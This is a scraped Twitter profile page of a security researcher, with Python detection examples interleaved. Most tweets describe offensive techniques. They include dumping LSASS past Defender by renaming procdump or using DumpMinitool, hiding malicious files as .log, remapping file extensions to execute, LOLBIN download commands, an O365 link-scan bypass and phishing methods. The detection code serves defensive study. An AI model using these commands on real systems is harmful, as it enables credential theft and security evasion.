mr.d0x Profile
mr.d0x

@mrd0x

Followers
42K
Following
3K
Media
48
Statuses
1K

Security researcher | Co-founder https://t.co/QxBlzpa7Y4 | https://t.co/zqMXQRZRGl | https://t.co/Fq7WSqU9kI | https://t.co/eKezFcOEcL

Joined November 2020
@mrd0x
mr.d0x
2 years
MalDev Academy is ready! Website: MaldevAcademy[.]com. Launch date: April 16th, 2023.
- 32 Beginner modules
- 49 Intermediate modules
- 10 Advanced modules
- 20 in the works for updates in the next few months
- 65 Custom code samples
Very fair pricing, starting at $249. @NUL0x4C.
167
266
863
@mrd0x
mr.d0x
3 years
I published a blog article detailing a phishing technique I called Browser in the Browser (BITB) Attack. It's very simple but can be very effective. I also published templates on my Github feel free to test them out.
Tweet media one
112
1K
4K
@mrd0x
mr.d0x
3 years
If you rename procdump.exe to dump64.exe and place it in the "C:\Program Files (x86)\Microsoft Visual Studio\*" folder, you can bypass Defender and dump LSASS.
Tweet media one
48
1K
3K
@mrd0x
mr.d0x
3 years
Bypass Defender AV static detection: If you name a malicious file DumpStack.log Defender doesn't scan it.
Tweet media one
41
1K
3K
@mrd0x
mr.d0x
3 years
I'll be dropping a new phishing technique for stealing credentials & bypassing 2FA today. You do not want to miss this.
37
385
2K
@mrd0x
mr.d0x
3 years
Steal Credentials & Bypass 2FA Using noVNC.
Tweet media one
54
670
2K
@mrd0x
mr.d0x
3 years
Here I bypassed Defender AV by making: .eyb files as .exe, .faq files as .dll. I'm sure this can work on other security solutions and for many other blacklisted techniques. (1/2)
Tweet media one
27
508
2K
@mrd0x
mr.d0x
2 years
Chromium's application mode can be used to easily build realistic phishing desktop applications. Enjoy.
Tweet media one
24
460
1K
@mrd0x
mr.d0x
2 years
Reminder that creating a memory dump of Outlook.exe not only produces access tokens but also potentially sensitive email content.
Tweet media one
Tweet media two
20
248
1K
@mrd0x
mr.d0x
8 months
Phishing with Progressive Web Apps: More fake URL bars :)
Tweet media one
19
263
991
@mrd0x
mr.d0x
3 years
LOLBIN to dump LSASS:
Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions
Binary: DumpMinitool.exe
The params are case sensitive.
Tweet media one
Tweet media two
Tweet media three
14
311
932
@mrd0x
mr.d0x
3 years
Another way to download files using msedge/chrome:
[msedge.exe | chrome.exe] --headless --enable-logging --disable-gpu --dump-dom "http://server/evil.b64.html" > out.b64
- Downloaded file should end with .html.
- Binaries should be encoded.
Tweet media one
5
345
897
@mrd0x
mr.d0x
3 years
Today I've launched I've been analyzing malware source code that utilizes WinAPIs and have been categorizing them. Please feel free to contribute as I know the current list is not exhaustive.
25
349
886
@mrd0x
mr.d0x
3 years
Living Off Trusted Sites: Attackers are using popular legitimate domains to conduct attacks (e.g. phishing). I've attempted to compile a list of legitimate domains that can be abused by attackers. As usual, feel free to contribute.
34
335
834
@mrd0x
mr.d0x
2 years
Stealing Access Tokens From Office Desktop Applications.
9
274
803
@mrd0x
mr.d0x
3 years
Bypassing Cortex XDR.
27
296
779
@mrd0x
mr.d0x
3 years
It seems that you can still completely bypass Defender AV's static detection using *.log files, only now you have to use DLLs instead of EXEs.
Tweet media one
Tweet media two
Tweet media three
11
260
768
@mrd0x
mr.d0x
3 years
If you compose an email using the "Reply" function on O365 which has a link, intercept the request and add an extra empty href attribute then O365 won't scan the link anymore. <a href="phishing link">click</a> ==> junk.<a href="" href="phishing link">click</a> ==> inbox
Tweet media one
Tweet media two
10
241
748
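As an added example (not from the tweet above, and not Microsoft or O365 code), here is how a link scanner can avoid the parser differential the tweet describes: collect every href value on a tag and flag any tag that repeats an attribute name. The HTML spec tells browsers to keep the first copy of a duplicated attribute, but which copy a given mail client or scanner keeps is exactly what this code does not depend on: it treats every value as a candidate. The sample email body is constructed.

```python
from html.parser import HTMLParser


class LinkAuditor(HTMLParser):
    """Collect every href on every <a> and record any tag that repeats an
    attribute name, e.g. <a href="" href="https://..."> from the tweet above."""

    def __init__(self):
        super().__init__()
        self.links = []       # every href value, in document order
        self.duplicates = []  # (tag, attribute, [all values]) for repeated attributes

    def handle_starttag(self, tag, attrs):
        # HTMLParser hands us attrs as an ordered list and keeps duplicates,
        # so we see all copies instead of whichever one a renderer "wins" on.
        seen = {}
        for name, value in attrs:
            seen.setdefault(name.lower(), []).append(value or "")
        for name, values in seen.items():
            if len(values) > 1:
                self.duplicates.append((tag, name, values))
        if tag == "a":
            self.links.extend(seen.get("href", []))


def audit_html(html):
    """Return every href seen and every duplicated attribute in the document."""
    parser = LinkAuditor()
    parser.feed(html)
    parser.close()
    return {"links": parser.links, "duplicates": parser.duplicates}


def urls_to_scan(html):
    """Scanner policy: every non-empty href is a candidate URL, regardless of
    which copy a renderer would actually follow."""
    return [u for u in audit_html(html)["links"] if u.strip()]


# Constructed sample: a reply body carrying the double-href trick.
SAMPLE_EMAIL = (
    '<p>Please review the document.</p>'
    '<a href="" href="https://login-example.invalid/o365">click</a>'
    '<a href="https://intranet.example/">intranet</a>'
)

if __name__ == "__main__":
    result = audit_html(SAMPLE_EMAIL)
    for tag, name, values in result["duplicates"]:
        print(f"duplicate attribute <{tag} {name}> with values {values}")
    print("scan:", urls_to_scan(SAMPLE_EMAIL))
```

A duplicated attribute on an anchor is a strong signal on its own; a scanner that only ever looks at "the" href value of a tag has already picked a side in the parser differential.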
@mrd0x
mr.d0x
2 years
For the past couple of months @NUL0x4C and I have been working on a module-based malware dev training course that covers various techniques in-depth. Its emphasis is on simplifying complex concepts & evasion. Every module contains highly commented custom code. Stay tuned!
Tweet media one
37
158
749
@mrd0x
mr.d0x
3 years
Inserted attachments on OneNote can be directly downloaded. The domain used is onenoteonlinesync[.]onenote[.]com.
1. Insert a file attachment on a OneNote Notebook.
2. Double click the inserted attachment and grab the direct download link.
Added to
Tweet media one
Tweet media two
7
228
691
@mrd0x
mr.d0x
3 years
EvilSelenium - This project weaponizes Selenium to attack Chrome. Dump saved credentials, cookies, take (authenticated) screenshots, dump emails from gmail/o365 or chats from Whatsapp and exfiltrate & download files. ENJOY.
8
261
642
@mrd0x
mr.d0x
3 years
Twitter is great for sharing infosec related stuff, but it's also too dynamic and people may miss stuff. So every few months I'll link any interesting tweets I had made. Enjoy.
12
169
610
@mrd0x
mr.d0x
3 years
msedge kiosk mode + a fake Windows login page. Don't know if it's practical, but interesting for sure. msedge.exe --app="http://example[.]com/index.html" --kiosk
Tweet media one
8
124
585
@mrd0x
mr.d0x
3 years
Outlook attachments can be directly downloaded.
1. Compose an email.
2. Attach a file (add .txt to the end if it's a restricted file type).
3. Click on the file to download it and grab the link (attachment[.]outlook[.]live[.]net).
Link is valid for ~15 minutes.
Tweet media one
16
209
585
@mrd0x
mr.d0x
3 years
Here it is:
19
164
577
@mrd0x
mr.d0x
2 years
Reminder to not trust calendar (.ics) attendees.
Tweet media one
10
159
586
@mrd0x
mr.d0x
3 years
LOLBIN(s): mpiexec.exe & smpd.exe. Path: C:\Program Files\Microsoft MPI\Bin. mpiexec.exe spawns smpd.exe which then spawns an executable. Usage: mpiexec.exe -n 1 c:\path\to\binary.exe (1/2)
Tweet media one
Tweet media two
Tweet media three
2
221
568
@mrd0x
mr.d0x
3 years
explorer.exe can launch a browser and download a file. Append a harmless extension to the file then remove it after download.
Default browser: explorer.exe https://server/file.exe.txt
Edge: explorer.exe microsoft-edge:https://server/file.exe.txt
6
156
492
@mrd0x
mr.d0x
3 years
Abusing Google Drive's Email File Functionality for phishing. Enjoy!
3
182
476
@mrd0x
mr.d0x
3 years
Anyone else aware that .asd files can contain macros? Literally just found out. Added to Filesec.
Tweet media one
6
138
438
@mrd0x
mr.d0x
3 years
WebView2 desktop applications have functionality that allows for JS to be injected into any website & for cookies to be stolen. In my new blog post I explore how it can be used by attackers and I provide working code. Enjoy!
11
160
410
@mrd0x
mr.d0x
3 years
Demo: Injecting a JS keylogger using WebView2 into login[.]microsoftonline[.]com. Better quality: Blog post:
10
142
382
@mrd0x
mr.d0x
2 years
Didn't have time to talk about the newly released TLDs last week, but here we go. File Archiver In The Browser: Emulating file archive software in the browser with a .zip domain for phishing.
11
143
377
@mrd0x
mr.d0x
3 years
Phishing O365 Users With Spoofed Cloud Attachments.
3
152
362
@mrd0x
mr.d0x
3 years
Procdump dump lsass. Defender: Threat detected!
Sqldumper dump lsass. Defender: Sure, go right ahead!
btw dumping lsass with sqldumper.exe is not new, actually it's quite old.
Tweet media one
Tweet media two
5
96
355
@mrd0x
mr.d0x
3 years
devinit.exe - Great MS signed tool with tons of useful commands but needs VS to run properly. I tested msi-install, it downloads an MSI file to C:\Windows\Installer\ then installs it. devinit.exe run -t msi-install -i http://10.0.0.18/out.msi
Tweet media one
4
114
345
@mrd0x
mr.d0x
3 years
LOLBIN: Microsoft.NodejsTools.PressAnyKey.exe. Execute a local binary or one from a file share. Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools
Tweet media one
Tweet media two
Tweet media three
2
117
328
@mrd0x
mr.d0x
9 months
It's unfortunate to see how many people no longer share tools/research the same way as before. I believe funding researchers and developers is the way forward.
28
22
291
@mrd0x
mr.d0x
3 years
Procdump works against Defender with a simple rename. It quarantines the generated .dmp file but you have a few seconds to make a copy of it before it's removed. I've seen other security solutions that do this, try to copy the file quickly before it's removed.
Tweet media one
Tweet media two
8
88
281
@mrd0x
mr.d0x
3 years
I've created a simple Python script that converts executables generated with pe_to_shellcode to a format that works with cdb.exe. Useful for evasion & application whitelisting bypass.
0
117
270
@mrd0x
mr.d0x
3 years
Attempting to access protection history after detecting a malicious file with a really long name + path crashes Defender's UI lol.
7
45
257
@mrd0x
mr.d0x
9 months
Lol
Tweet media one
Tweet media two
Tweet media three
@Unit42_Intel
Unit 42
9 months
2024-05-14 (Tuesday): #DarkGate activity. HTML file asks victim to paste script into a run window. Indicators available at #TimelyThreatIntel #Unit42ThreatIntel #Wireshark #InfectionTraffic
Tweet media one
Tweet media two
Tweet media three
Tweet media four
6
51
246
@mrd0x
mr.d0x
11 months
How much awareness is there around Context Menu Spoofing/Hijacking for persistence? Here's hijacking SentinelOne's "Scan for threats" to run a command.
6
69
238
@mrd0x
mr.d0x
3 years
You can spoof almost everything in a Calendar invite by customizing an .ics file. I think this can definitely trick many users.
2
85
221
@mrd0x
mr.d0x
3 years
You should probably be aware of this technique. Custom Previews For Malicious Attachments.
2
86
207
@mrd0x
mr.d0x
3 years
I mentioned a few days ago that there are two LOLBIN binaries that do DLL injection. After re-checking the digital signature I don't believe they're considered LOLBINs (correct me if I'm wrong) but since they're interesting I'll share them anyway. (1/2)
Tweet media one
Tweet media two
2
74
202
@mrd0x
mr.d0x
3 years
Start Edge minimized, download file, delay a few seconds to allow download to complete and kill Edge: start /min msedge.exe https://server/file.exe.zip && timeout 3 && taskkill /IM "msedge.exe" /F. Modify file extension back to original after download.
5
70
205
@mrd0x
mr.d0x
3 years
updated. Thanks to all the contributors.
6
51
193
@mrd0x
mr.d0x
2 years
Interesting initial access techniques dropping tomorrow at @MalDevAcademy
5
31
192
@mrd0x
mr.d0x
2 years
"Although the code and the technique was copied from the mrd0x original blogpost dating back to 2022, the analysed document is currently only detected by one antivirus engine on VirusTotal (eScan) at the time of writing." 🤔.
Tweet media one
2
46
192
@mrd0x
mr.d0x
11 months
Hijacking & Spoofing Context Menu Options.
5
49
172
@mrd0x
mr.d0x
3 years
Tampering with ForcePoint DLP. Write up on CVE-2022-27608 & CVE-2022-27609.
5
45
150
@mrd0x
mr.d0x
2 years
I'll be dropping two variations of a new initial access technique exclusively for @MalDevAcademy premium & lifetime users (in update 2 or update 3). Red teamers you'll be very happy. Blue teamers you'll want to have safeguards in place for this.
3
24
153
@mrd0x
mr.d0x
3 years
I actually didn't know about the Windows Device Portal feature. Kernel & process dumps, process and network information, application management all with optional authentication? I'll take it.
Tweet media one
Tweet media two
2
36
141
@mrd0x
mr.d0x
3 years
16 new entries added to Thanks for the contributions.
4
37
142
@mrd0x
mr.d0x
2 years
All security solution vulns I previously found were too easily exploitable. In the newly posted Exploiting EDRs For Evasion module in @MalDevAcademy I demonstrated how changing a non-protected registry key prevents logs from arriving to the EDR console. Too easy.
5
21
131
@mrd0x
mr.d0x
2 years
Check out AtomLdr, something you'll be able to build after completing this training.
3
25
131
@mrd0x
mr.d0x
3 years
Or just fake the entire Desktop using HTML/CSS/JS. LOL. Win10css:
Tweet media one
4
8
122
@mrd0x
mr.d0x
1 year
Havoc made the cut @C5pider 🎉.
@kalilinux
Kali Linux
1 year
Before we wrap up the year, it’s time to get out one last Kali release for 2023. Announcing Kali 2023.4! for a focus on the addition of Hyper-V support to Vagrant, ARM64 Cloud images, support for the Pi 5, and an update to Gnome 45. Check it out!
Tweet media one
1
3
117
@mrd0x
mr.d0x
3 years
I guess this is their way of whitelisting their dump64.exe tool that comes with Microsoft Visual Studio.
1
10
114
@mrd0x
mr.d0x
3 years
20 new websites added to An interesting site added is feedproxy[.]google[.]com. I was not aware that it's being used in phishing attacks. Creds: @BushidoToken.
7
32
116
@mrd0x
mr.d0x
3 years
@chvancooten And if you want to bypass that big splash screen, you can :).
3
33
111
@mrd0x
mr.d0x
3 years
Outlook link preview spoofing. Either modify the HTML while sending it or insert a different link when it tries to fetch a preview of the site.
Tweet media one
1
7
104
@mrd0x
mr.d0x
3 years
LOTS Project updated: 15 new entries.
2
36
104
@mrd0x
mr.d0x
3 years
Since any file extension can be modified to become executable, wouldn't something like this mess with rules that look for "cmd.exe" spawning "powershell.exe" for example?
Tweet media one
4
5
95
@mrd0x
mr.d0x
3 years
Just added a new batch of sites to Thanks to all the contributors. Will continue to add more.
1
20
96
@mrd0x
mr.d0x
3 years
For example, to make .eyb act as a .exe go to Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.eyb and modify it as shown in the image. (2/2)
Tweet media one
4
14
96
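An added detection example for the two-part trick above (my code, not from the tweets or from mr.d0x's tooling): the (1/2) tweet maps .eyb to .exe and .faq to .dll, and the (2/2) tweet points at HKLM\SOFTWARE\Classes\.eyb. The image showing the edit is not on this page, so the code assumes the extension key's (Default) value was pointed at the exefile/dllfile ProgID; the "expected" extension per ProgID is likewise an assumption about stock Windows mappings. It parses a .reg export (constructed sample inline) and reports extensions mapped to an executable ProgID other than the one that ProgID normally owns.

```python
import re

# ProgIDs whose handlers run the file as code, and the extension each is
# expected to own on a stock install (assumption: stock Windows mappings).
EXECUTABLE_PROGIDS = {
    "exefile": ".exe", "dllfile": ".dll", "batfile": ".bat",
    "cmdfile": ".cmd", "comfile": ".com", "scrfile": ".scr",
}

_KEY = re.compile(r"^\[(?P<key>[^\]]+)\]\s*$")
_DEFAULT = re.compile(r'^@="(?P<val>[^"]*)"\s*$')


def parse_reg_export(text):
    """Map each [key] in a .reg export to its (Default) string value, if any."""
    defaults, current = {}, None
    for line in text.splitlines():
        m = _KEY.match(line)
        if m:
            current = m.group("key")
            defaults.setdefault(current, None)
            continue
        m = _DEFAULT.match(line)
        if m and current is not None:
            defaults[current] = m.group("val")
    return defaults


def find_hijacked_extensions(text):
    """Return (extension, progid) pairs where an extension under
    SOFTWARE\\Classes points at an executable ProgID it does not normally own."""
    hits = []
    for key, progid in parse_reg_export(text).items():
        if progid is None:
            continue
        ext = key.rsplit("\\", 1)[-1]
        if not ext.startswith(".") or "\\SOFTWARE\\CLASSES\\" not in key.upper():
            continue
        expected = EXECUTABLE_PROGIDS.get(progid.lower())
        if expected and ext.lower() != expected:
            hits.append((ext, progid))
    return hits


# Constructed sample export: stock .exe and .txt plus the two hijacked extensions.
# A real export from reg.exe is UTF-16; read it with encoding="utf-16" first.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe]
@="exefile"
"Content Type"="application/x-msdownload"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.eyb]
@="exefile"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.faq]
@="dllfile"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.txt]
@="txtfile"
"""

if __name__ == "__main__":
    for ext, progid in find_hijacked_extensions(SAMPLE_REG):
        print(f"{ext} -> {progid}")
```

The same check applies to HKCU\SOFTWARE\Classes, where a non-admin user can create the mapping for their own session; the key path filter above matches both hives.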
@mrd0x
mr.d0x
3 years
LOTS Project updated with 16 new entries. Thanks to all contributors.
0
25
90
@mrd0x
mr.d0x
2 years
Throwback:
@_zblurx
Thomas Seigneuret
2 years
Want to bypass Windows Defender when dumping LSASS ? Just dump into .log files😅
Tweet media one
3
10
91
@mrd0x
mr.d0x
2 years
I'll be disclosing a new LOLBIN this week on the @MalDevAcademy Discord channel that can be used for downloading files on the machine. Stay tuned!
2
6
84
@mrd0x
mr.d0x
2 years
Hope you all enjoy it.
@MalDevAcademy
MalDev Academy
2 years
MaldevAcademy[.]com is now live!
4
9
81
@mrd0x
mr.d0x
2 years
Review:
0
18
80
@mrd0x
mr.d0x
3 years
Hide your phishing link behind Google's domain. Thanks Google you're always adding some great "features".
0
35
81
@mrd0x
mr.d0x
3 years
Please make sure you're aware that this technique is not necessarily VNC specific. Of course it can work with any web-based remote access method (e.g. web-based RDP, TeamViewer etc). But I felt noVNC provided the most seamless experience to target users.
@mrd0x
mr.d0x
3 years
Steal Credentials & Bypass 2FA Using noVNC.
Tweet media one
1
15
77
@mrd0x
mr.d0x
3 years
Another 30 APIs added to since yesterday. Thanks for all your support. Please continue submitting APIs I'll add them as soon as possible.
0
17
73
@mrd0x
mr.d0x
3 years
t[.]m1[.]email[.]samsung[.]com is being used to redirect users to phishing websites. Reference:
1
20
69
@mrd0x
mr.d0x
3 years
Finally had some time to push new APIs on Sorry for the delay and thanks to all contributors.
1
14
69
@mrd0x
mr.d0x
3 years
Since MS Teams now allows external users to message users within an organization, the Teams Abuse article may be worth a revisit. I also updated it to add a few more techniques.
1
19
71
@mrd0x
mr.d0x
3 years
I disabled multiple security solutions using a simple method which involves stopping/modifying the dependencies of the service.
1. sc qc <service> ==> check dependencies.
2. sc qc <dependency> ==> stop it or attempt to modify it through the registry.
0
14
63
@mrd0x
mr.d0x
1 year
Why does it feel like we're asking for too much?
@vxunderground
vx-underground
1 year
All we want is a basic web browser with an ad blocker.
2
3
62
@mrd0x
mr.d0x
3 years
I added macros as a category on Credits to @Hexacorn for making me realize how many file extensions there are related to macros. I also removed a few other categories that I don't think are as useful as I initially thought they'd be. Enjoy!
2
19
60
@mrd0x
mr.d0x
3 years
I really like 12ft[.]io which is used to bypass paywalls. But be aware that it can also be used to masquerade phishing links. Reference:
0
11
58
@mrd0x
mr.d0x
3 years
@vaisovbek Nope, like this:
1
6
58
@mrd0x
mr.d0x
3 years
Sorry if the images are blurry on the blog post. They are available on the Github Repo in far better resolution:
0
8
60
@mrd0x
mr.d0x
3 years
Cortex XDR advisory.
5
6
57
@mrd0x
mr.d0x
3 years
@Warlockobama That's the first thing that comes to mind for sure. But now users will have 3 thoughts when they notice this: 1. Suspicious 2. Technical glitch 3. Intended "feature". Maybe if we're lucky our odds may just be the latter two.
1
4
57
@mrd0x
mr.d0x
2 years
@n00py1 I mentioned an alternative way of doing this in one of my previous posts. Combine that with BITB and it becomes pretty realistic.
Tweet media one
1
8
54
@mrd0x
mr.d0x
3 years
I think this is a great example of how important it is to be conscious of what you put out there. The smallest things can potentially be used in ways you didn't expect.
5
6
46
@mrd0x
mr.d0x
3 years
Can confirm this works. Another way is to send an email saying "There's IT work going on you may receive a 2FA prompt, just accept it." Surprisingly it works.
0
8
42
@mrd0x
mr.d0x
3 years
Sometimes it's that simple.
@mrd0x
mr.d0x
3 years
Can confirm this works. Another way is to send an email saying "There's IT work going on you may receive a 2FA prompt, just accept it." Surprisingly it works.
0
11
41
@mrd0x
mr.d0x
3 years
Turns out args: 0,2,4 are useless and can be literally anything as long as args 1,3,5 are valid. Watch out for this if you're writing detection rules.
@4A616D6573
4A616D6573
3 years
@mrd0x Example that works:
/DumpMinitool.exe 1 'dump6.txt' 2 660 3 Full
Dump minitool: Started with arguments 1 dump6.txt 2 660 3 Full
Output file: 'dump6.txt'
Process id: 660
Dump type: Full
Dumped process.
Tweet media one
1
13
42
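An added example (my code, not the thread author's) of a detection that follows the advice in the thread: key the rule on positions 1, 3 and 5 after DumpMinitool.exe rather than on the flag names, since positions 0, 2 and 4 are accepted unchecked. That the flags are normally --file, --processId and --dumpType is an assumption from the tool's documented usage, not something this page states; the process table and command lines are constructed samples, and in practice the pid would be resolved against the telemetry that produced the command line.

```python
import re

_TOKEN = re.compile(r'"[^"]*"|\'[^\']*\'|\S+')
TARGET_BINARY = "dumpminitool.exe"
SENSITIVE_PROCESSES = {"lsass.exe"}


def _tokens(cmdline):
    """Split a Windows command line, stripping surrounding quotes from each token."""
    return [t[1:-1] if len(t) > 1 and t[0] in "\"'" and t[-1] == t[0] else t
            for t in _TOKEN.findall(cmdline)]


def dumpminitool_args(cmdline):
    """Return (dump file, target pid, dump type) taken positionally from a
    DumpMinitool.exe command line, or None if it is not such a command line.
    Tokens at positions 0, 2 and 4 after the binary (normally the --file,
    --processId and --dumpType flag names; an assumption from the documented
    usage) are ignored because the thread shows they are not validated."""
    toks = _tokens(cmdline)
    for i, tok in enumerate(toks):
        if re.split(r"[\\/]", tok)[-1].lower() == TARGET_BINARY:
            rest = toks[i + 1:]
            if len(rest) < 6:
                return None
            try:
                pid = int(rest[3])
            except ValueError:
                return None
            return rest[1], pid, rest[5]
    return None


def is_sensitive_dump(cmdline, process_table):
    """True when the positional target pid resolves to a protected process."""
    parsed = dumpminitool_args(cmdline)
    if parsed is None:
        return False
    _, pid, _ = parsed
    return process_table.get(pid, "").lower() in SENSITIVE_PROCESSES


# Constructed sample telemetry: pid -> image name, plus command lines seen.
PROCESS_TABLE = {660: "lsass.exe", 4321: "notepad.exe"}
SAMPLE_CMDLINES = [
    "DumpMinitool.exe 1 'dump6.txt' 2 660 3 Full",
    r'"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE'
    r'\Extensions\TestPlatform\Extensions\DumpMinitool.exe" '
    r'--file C:\Temp\out.dmp --processId 4321 --dumpType Full',
    "procdump.exe -ma 660 out.dmp",
]

if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        print(is_sensitive_dump(c, PROCESS_TABLE), "|", c)
```

The first sample is the exact shape from the reply above and still resolves to LSASS; the second uses the conventional flag names and is benign only because the pid is not a protected process. A rule that matched the literal string "--processId" would miss the first case entirely.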
@mrd0x
mr.d0x
3 years
@techspence I only tested it with downloading and copying from a remote share. Using SMB is shown in the attached image. Also note that it's still subject to other methods of detection like behavior, heuristics etc.
Tweet media one
1
1
41
@mrd0x
mr.d0x
2 years
@mythicalcmd @NUL0x4C This training is far more in-depth. Also it's text-based not video-based. There's custom code (all commented) and exclusive tools shared on there. Here's an example of one module that covers a custom tool 'HellShell'.
Tweet media one
2
5
42
@mrd0x
mr.d0x
11 months
@NinjaParanoid I feel like it’s a small part of the community but they’re just very loud and always seem to be morally and intellectually superior than everyone else.
2
0
40
@mrd0x
mr.d0x
2 years
Tweet media one
@mrd0x
mr.d0x
2 years
I'll be disclosing a new LOLBIN this week on the @MalDevAcademy Discord channel that can be used for downloading files on the machine. Stay tuned!
0
2
36
@mrd0x
mr.d0x
3 years
Thanks to all those contributing and sorry for the delay. => new extensions added. => new APIs added.
1
15
38
@mrd0x
mr.d0x
2 years
One of the tools included in the upcoming malware dev course.
@NUL0x4C
NULL
2 years
Another tool for the upcoming Maldev Academy course! This tool is part of the entropy reduction module.
2
4
38
@mrd0x
mr.d0x
3 years
PoC:
1
8
36